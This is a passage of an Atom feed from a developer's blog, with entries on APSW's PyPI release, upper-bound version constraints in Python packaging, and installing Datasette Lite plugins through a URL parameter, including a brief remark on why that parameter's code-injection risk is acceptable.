</summary><category term="open-source"/><category term="packaging"/><category term="pypi"/><category term="python"/><category term="psf"/></entry><entry><title>APSW is now available on PyPI</title><link href="https://simonwillison.net/2022/Sep/15/apsw/#atom-tag" rel="alternate"/><published>2022-09-15T22:18:04+00:00</published><updated>2022-09-15T22:18:04+00:00</updated><id>https://simonwillison.net/2022/Sep/15/apsw/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/rogerbinns/apsw/issues/310#issuecomment-1147959810"&gt;APSW is now available on PyPI&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
News I missed from June: the venerable (17+ years old) APSW SQLite library for Python is now officially available on PyPI as a set of wheels, built using cibuildwheel. This is a really big deal: APSW is an extremely well maintained library which exposes far more low-level SQLite functionality than the standard library’s sqlite3 module, and until now one of the only disadvantages of using it was the need to install it from somewhere other than PyPI. Now you can just run “pip install apsw”.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/apsw"&gt;apsw&lt;/a&gt;&lt;/p&gt;



</summary><category term="pypi"/><category term="python"/><category term="sqlite"/><category term="apsw"/></entry><entry><title>Should You Use Upper Bound Version Constraints?</title><link href="https://simonwillison.net/2022/Sep/5/upper-bound-version-constraints/#atom-tag" rel="alternate"/><published>2022-09-05T17:42:02+00:00</published><updated>2022-09-05T17:42:02+00:00</updated><id>https://simonwillison.net/2022/Sep/5/upper-bound-version-constraints/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://iscinumpy.dev/post/bound-version-constraints/"&gt;Should You Use Upper Bound Version Constraints?&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Should you pin your library's dependencies using &lt;code&gt;"click&amp;gt;=7,&amp;lt;8"&lt;/code&gt; or &lt;code&gt;"click~=7.0"&lt;/code&gt;? Henry Schreiner's short answer is no, and his long answer is an exhaustive essay covering every conceivable aspect of this thorny Python packaging problem.
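For readers unfamiliar with the two operators, here is a rough sketch of what each specifier accepts, using plain tuple comparison on (major, minor) pairs rather than the full PEP 440 rules that pip actually applies (via the packaging library):

```python
def satisfies_range(version, low=(7, 0), high=(8, 0)):
    """Emulate "click>=7,<8": at least `low`, strictly below `high`."""
    return low <= version < high

def satisfies_compatible(version, base=(7, 0)):
    """Emulate "click~=7.0": >=7.0 and ==7.* (same major version)."""
    return version >= base and version[0] == base[0]

for v in [(6, 9), (7, 0), (7, 5), (8, 0)]:
    print(v, satisfies_range(v), satisfies_compatible(v))
```

Both specifiers accept the same versions here - the question the essay tackles is whether a library should impose that upper bound at all.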

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://twitter.com/AdamChainz/status/1566729766388092929"&gt;@AdamChainz&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;&lt;/p&gt;



</summary><category term="packaging"/><category term="pypi"/><category term="python"/></entry><entry><title>Plugin support for Datasette Lite</title><link href="https://simonwillison.net/2022/Aug/17/datasette-lite-plugins/#atom-tag" rel="alternate"/><published>2022-08-17T18:20:59+00:00</published><updated>2022-08-17T18:20:59+00:00</updated><id>https://simonwillison.net/2022/Aug/17/datasette-lite-plugins/#atom-tag</id><summary type="html">
    &lt;p&gt;I've added a new feature to &lt;a href="https://lite.datasette.io/"&gt;Datasette Lite&lt;/a&gt;, my distribution of &lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt; that runs entirely in the browser using Python and SQLite compiled to WebAssembly. You can now install additional &lt;a href="https://datasette.io/plugins"&gt;Datasette plugins&lt;/a&gt; by passing them in the URL.&lt;/p&gt;
&lt;h4&gt;Datasette Lite background&lt;/h4&gt;
&lt;p&gt;Datasette Lite runs Datasette in the browser. I initially built it as a fun technical proof of concept, but I'm increasingly finding it to be a genuinely useful tool for quick ad-hoc data analysis and publication. Not having any server-side components at all makes it effectively free to use without fear of racking up cloud computing costs for a throwaway project.&lt;/p&gt;
&lt;p&gt;You can read more about Datasette Lite in these posts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://simonwillison.net/2022/May/4/datasette-lite/"&gt;Datasette Lite: a server-side Python web application running in a browser&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://simonwillison.net/2022/Jun/20/datasette-lite-csvs/"&gt;Joining CSV files in your browser using Datasette Lite&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2022/Jul/30/psf-board/#scraping-datasette-lite"&gt;Scraping data into Datasette Lite&lt;/a&gt; shows an example project where I scraped PSF board resolutions, stored the results in a CSV file in &lt;a href="https://gist.github.com/simonw/71b03ca3688c8f37fe1b35859ebc458b"&gt;a GitHub Gist&lt;/a&gt; and then constructed &lt;a href="https://lite.datasette.io/?csv=https%3A%2F%2Fgist.githubusercontent.com%2Fsimonw%2F71b03ca3688c8f37fe1b35859ebc458b%2Fraw%2Fd3ca708e5d6242848201d1d4c1c2ddbba15c4d28%2Fpsf-resolutions.csv#/data?sql=with+filtered+as+%28%0A++select+*+from%0A++++%5Bpsf-resolutions%5D%0A++where%0A++++%22dollars%22+is+not+null%0A++++and+%22text%22+like+%27%25%27+%7C%7C+%3Asearch+%7C%7C+%27%25%27%0A%29%0Aselect%0A++%27Total%3A+%24%27+%7C%7C+printf%28%27%25%2Cd%27%2C+sum%28dollars%29%29+as+text%2C%0A++null+as+date%0Afrom+filtered%0Aunion+all%0Aselect%0A++text%2C+date%0Afrom+filtered%3B&amp;amp;search=Nigeria"&gt;this URL&lt;/a&gt; to open the result in Datasette Lite and execute a SQL query.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Adding plugins to Datasette Lite&lt;/h4&gt;
&lt;p&gt;One of Datasette's key features is support for plugins. There are over 90 listed in the &lt;a href="https://datasette.io/plugins"&gt;plugin directory&lt;/a&gt; now, with more emerging all the time. They're a fantastic way to explore new feature ideas and extend the software to handle non-default use cases.&lt;/p&gt;
&lt;p&gt;Plugins are Python packages, published to &lt;a href="https://pypi.org/"&gt;PyPI&lt;/a&gt;. You can add them to Datasette Lite using the new &lt;code&gt;?install=name-of-plugin&lt;/code&gt; query string parameter.&lt;/p&gt;
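As a rough illustration (Datasette Lite itself does this parsing in JavaScript in the browser), extracting the plugin names from that query string amounts to something like:

```python
from urllib.parse import parse_qs, urlparse

def install_packages_from_url(url):
    """Extract the ?install= plugin names from a Datasette Lite URL.

    parse_qs collects repeated install= parameters into a single list.
    """
    return parse_qs(urlparse(url).query).get("install", [])

print(install_packages_from_url(
    "https://lite.datasette.io/?install=datasette-jellyfish#/fixtures"
))  # → ['datasette-jellyfish']
```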
&lt;p&gt;Here's an example URL that loads the &lt;a href="https://datasette.io/plugins/datasette-jellyfish"&gt;datasette-jellyfish&lt;/a&gt; plugin, which adds new SQL functions for calculating distances between strings, then executes a SQL query that demonstrates that plugin:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://lite.datasette.io/?install=datasette-jellyfish#/fixtures?sql=SELECT%0A++++levenshtein_distance%28%3As1%2C+%3As2%29%2C%0A++++damerau_levenshtein_distance%28%3As1%2C+%3As2%29%2C%0A++++hamming_distance%28%3As1%2C+%3As2%29%2C%0A++++jaro_similarity%28%3As1%2C+%3As2%29%2C%0A++++jaro_winkler_similarity%28%3As1%2C+%3As2%29%2C%0A++++match_rating_comparison%28%3As1%2C+%3As2%29%3B&amp;amp;s1=barrack+obama&amp;amp;s2=barrack+h+obama"&gt;https://lite.datasette.io/?install=datasette-jellyfish#/fixtures?sql=SELECT%0A++++levenshtein_distance%28%3As1%2C+%3As2%29%2C%0A++++damerau_levenshtein_distance%28%3As1%2C+%3As2%29%2C%0A++++hamming_distance%28%3As1%2C+%3As2%29%2C%0A++++jaro_similarity%28%3As1%2C+%3As2%29%2C%0A++++jaro_winkler_similarity%28%3As1%2C+%3As2%29%2C%0A++++match_rating_comparison%28%3As1%2C+%3As2%29%3B&amp;amp;s1=barrack+obama&amp;amp;s2=barrack+h+obama&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;That URL uses &lt;code&gt;?install=datasette-jellyfish&lt;/code&gt; to install the plugin, then executes the following SQL query:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;SELECT&lt;/span&gt;
    levenshtein_distance(:s1, :s2),
    damerau_levenshtein_distance(:s1, :s2),
    hamming_distance(:s1, :s2),
    jaro_similarity(:s1, :s2),
    jaro_winkler_similarity(:s1, :s2),
    match_rating_comparison(:s1, :s2);&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It sets &lt;code&gt;s1&lt;/code&gt; to &lt;code&gt;"barrack obama"&lt;/code&gt; and &lt;code&gt;s2&lt;/code&gt; to &lt;code&gt;"barrack h obama"&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2022/datasette-lite-plugin.jpg" alt="Screenshot showing the results of that SQL query running in Datasette Lite. It compares the string barrack obama with the string barrack h obama and shows various different scores." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;h4&gt;Plugin compatibility&lt;/h4&gt;
&lt;p&gt;Unfortunately, many existing Datasette plugins aren't yet compatible with Datasette Lite. Most importantly, visualization plugins such as &lt;a href="https://datasette.io/plugins/datasette-cluster-map"&gt;datasette-cluster-map&lt;/a&gt; and &lt;a href="https://datasette.io/plugins/datasette-vega"&gt;datasette-vega&lt;/a&gt; don't work.&lt;/p&gt;
&lt;p&gt;This is because I haven't yet solved the challenge of loading additional JavaScript and CSS into Datasette Lite - see &lt;a href="https://github.com/simonw/datasette-lite/issues/8"&gt;issue #8&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Here's the full list of plugins that I've confirmed work with Datasette Lite so far:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://datasette.io/plugins/datasette-packages"&gt;datasette-packages&lt;/a&gt; - Show a list of currently installed Python packages - &lt;a href="https://lite.datasette.io/?install=datasette-packages#/-/packages"&gt;demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://datasette.io/plugins/datasette-dateutil"&gt;datasette-dateutil&lt;/a&gt; - dateutil functions for Datasette - &lt;a href="https://lite.datasette.io/?install=datasette-dateutil#/fixtures?sql=select%0A++dateutil_parse%28%2210+october+2020+3pm%22%29%2C%0A++dateutil_parse_fuzzy%28%22This+is+due+10+september%22%29%2C%0A++dateutil_parse%28%221%2F2%2F2020%22%29%2C%0A++dateutil_parse%28%222020-03-04%22%29%2C%0A++dateutil_parse_dayfirst%28%222020-03-04%22%29%3B"&gt;demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://datasette.io/plugins/datasette-schema-versions"&gt;datasette-schema-versions&lt;/a&gt; - Datasette plugin that shows the schema version of every attached database - &lt;a href="https://lite.datasette.io/?install=datasette-schema-versions#/-/schema-versions"&gt;demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://datasette.io/plugins/datasette-debug-asgi"&gt;datasette-debug-asgi&lt;/a&gt; - Datasette plugin for dumping out the ASGI scope. - &lt;a href="https://lite.datasette.io/?install=datasette-debug-asgi#/-/asgi-scope"&gt;demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://datasette.io/plugins/datasette-query-links"&gt;datasette-query-links&lt;/a&gt; - Turn SELECT queries returned by a query into links to execute them - &lt;a href="https://lite.datasette.io/?install=datasette-query-links#/fixtures?sql=select%0D%0A++'select+*+from+%5Bfacetable%5D'+as+query%0D%0Aunion%0D%0Aselect%0D%0A++'select+sqlite_version()'%0D%0Aunion%0D%0Aselect%0D%0A++'select+this+is+invalid+SQL+so+will+not+be+linked'"&gt;demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://datasette.io/plugins/datasette-json-html"&gt;datasette-json-html&lt;/a&gt; - Datasette plugin for rendering HTML based on JSON values - &lt;a href="https://lite.datasette.io/?install=datasette-json-html#/fixtures?sql=select+%27%5B%0A++++%7B%0A++++++++%22href%22%3A+%22https%3A%2F%2Fsimonwillison.net%2F%22%2C%0A++++++++%22label%22%3A+%22Simon+Willison%22%0A++++%7D%2C%0A++++%7B%0A++++++++%22href%22%3A+%22https%3A%2F%2Fgithub.com%2Fsimonw%2Fdatasette%22%2C%0A++++++++%22label%22%3A+%22Datasette%22%0A++++%7D%0A%5D%27+as+output"&gt;demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://datasette.io/plugins/datasette-haversine"&gt;datasette-haversine&lt;/a&gt; - Datasette plugin that adds a custom SQL function for haversine distances - &lt;a href="https://lite.datasette.io/?install=datasette-haversine#/fixtures?sql=select+haversine%280%2C+154%2C+1%2C+131%29"&gt;demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://datasette.io/plugins/datasette-jellyfish"&gt;datasette-jellyfish&lt;/a&gt; - Datasette plugin that adds custom SQL functions for fuzzy string matching, built on top of the Jellyfish Python library - &lt;a href="https://lite.datasette.io/?install=datasette-jellyfish#/fixtures?sql=SELECT%0A++++levenshtein_distance%28%3As1%2C+%3As2%29%2C%0A++++damerau_levenshtein_distance%28%3As1%2C+%3As2%29%2C%0A++++hamming_distance%28%3As1%2C+%3As2%29%2C%0A++++jaro_similarity%28%3As1%2C+%3As2%29%2C%0A++++jaro_winkler_similarity%28%3As1%2C+%3As2%29%2C%0A++++match_rating_comparison%28%3As1%2C+%3As2%29%3B&amp;amp;s1=barrack+obama&amp;amp;s2=barrack+h+obama"&gt;demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://datasette.io/plugins/datasette-pretty-json"&gt;datasette-pretty-json&lt;/a&gt; - Datasette plugin that pretty-prints any column values that are valid JSON objects or arrays. - &lt;a href="https://lite.datasette.io/?install=datasette-pretty-json#/fixtures?sql=select+%27%7B%22this%22%3A+%5B%22is%22%2C+%22nested%22%2C+%22json%22%5D%7D%27"&gt;demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://datasette.io/plugins/datasette-yaml"&gt;datasette-yaml&lt;/a&gt; - Export Datasette records as YAML - &lt;a href="https://lite.datasette.io/?install=datasette-yaml#/fixtures/compound_three_primary_keys.yaml"&gt;demo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://datasette.io/plugins/datasette-copyable"&gt;datasette-copyable&lt;/a&gt; - Datasette plugin for outputting tables in formats suitable for copy and paste - &lt;a href="https://lite.datasette.io/?install=datasette-copyable#/fixtures/compound_three_primary_keys.copyable?_table_format=github"&gt;demo&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;How it works&lt;/h4&gt;
&lt;p&gt;The implementation is pretty simple - it can be seen &lt;a href="https://github.com/simonw/datasette-lite/commit/5e348e84ff2cb38e4749aa36182db78e235dd9bc"&gt;in this commit&lt;/a&gt;. The short version is that &lt;code&gt;?install=&lt;/code&gt; options are passed through to the Python web worker that powers Datasette Lite, which then runs the following:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-k"&gt;for&lt;/span&gt; &lt;span class="pl-s1"&gt;install_url&lt;/span&gt; &lt;span class="pl-c1"&gt;in&lt;/span&gt; &lt;span class="pl-s1"&gt;install_urls&lt;/span&gt;:
    &lt;span class="pl-k"&gt;await&lt;/span&gt; &lt;span class="pl-s1"&gt;micropip&lt;/span&gt;.&lt;span class="pl-en"&gt;install&lt;/span&gt;(&lt;span class="pl-s1"&gt;install_url&lt;/span&gt;)&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://pyodide.org/en/stable/usage/api/micropip-api.html"&gt;micropip&lt;/a&gt; is a component of Pyodide which knows how to install pure Python wheels directly from PyPI into the browser's emulated Python environment. If you open up the browser devtools networking panel you can see that in action!&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2022/datasette-lite-devtools.jpg" alt="The Firefox Network pane shows a flurry of traffic, some of it to PyPI to look up the JSON descriptions of packages followed by downloads of .whl files from files.pythonhosted.org" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Since the &lt;code&gt;?install=&lt;/code&gt; parameter is being passed directly to &lt;code&gt;micropip.install()&lt;/code&gt; you don't even need to provide names of packages hosted on PyPI - you could instead provide the URL to a wheel file that you're hosting elsewhere.&lt;/p&gt;
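A hypothetical helper (not part of Datasette Lite or micropip) showing one way to tell the two kinds of install target apart:

```python
def is_wheel_url(target):
    """True if `target` looks like a direct URL to a .whl file
    rather than a bare PyPI package name."""
    return target.startswith(("http://", "https://")) and target.endswith(".whl")

print(is_wheel_url("datasette-jellyfish"))                           # False
print(is_wheel_url("https://example.com/pkg-1.0-py3-none-any.whl"))  # True
```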
&lt;p&gt;This means you can use &lt;code&gt;?install=&lt;/code&gt; as a code injection attack - you can install any Python code you want into the environment. I think that's fine - the only person who will be affected by this is the user who is viewing the page, and the &lt;code&gt;lite.datasette.io&lt;/code&gt; domain deliberately doesn't have any cookies set that could cause problems if someone were to steal them in some way.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/plugins"&gt;plugins&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/webassembly"&gt;webassembly&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pyodide"&gt;pyodide&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette-lite"&gt;datasette-lite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/cors"&gt;cors&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="plugins"/><category term="projects"/><category term="pypi"/><category term="datasette"/><category term="webassembly"/><category term="pyodide"/><category term="datasette-lite"/><category term="cors"/></entry></feed>